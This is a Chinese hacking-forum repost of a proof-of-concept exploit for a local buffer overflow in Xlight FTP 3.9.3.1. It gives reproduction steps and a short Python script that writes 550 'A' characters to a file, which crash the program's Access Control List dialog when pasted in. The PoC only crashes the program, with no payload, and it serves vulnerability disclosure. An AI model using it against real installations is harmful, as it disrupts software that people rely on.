跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)

精选回复

发布于
# Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-12
# Vendor Homepage: https://www.xlightftpd.com/
# Software Link: https://www.xlightftpd.com/download/setup.exe
# Tested Version: 3.9.3.1
# Vulnerability Type: Buffer Overflow Local
# Tested on OS: Windows XP SP3 -  Windows 7 Professional x86 SP1 - Windows 10 x64

# Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC)

# Steps to reproduce:
# 1. - Download and Xlight FTP
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open Xlight FTP 3.9.3.1
# 4. - "File and Directory - Access Control List - Setup - Added users list directories
# 5. - Go to Specify file or directory name applied or Specify username applied to or Specify groupname applied
# 6. - Go to Setup -> added -> Enter new Item -  Paste the characters 
# 7  - Crashed

#!/usr/bin/python

exploit = 'A' * 550

try: 
    file = open("exploit.txt","w")
    file.write(exploit)
    file.close()

    print("POC is created")
except:
    print("POC not created")
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。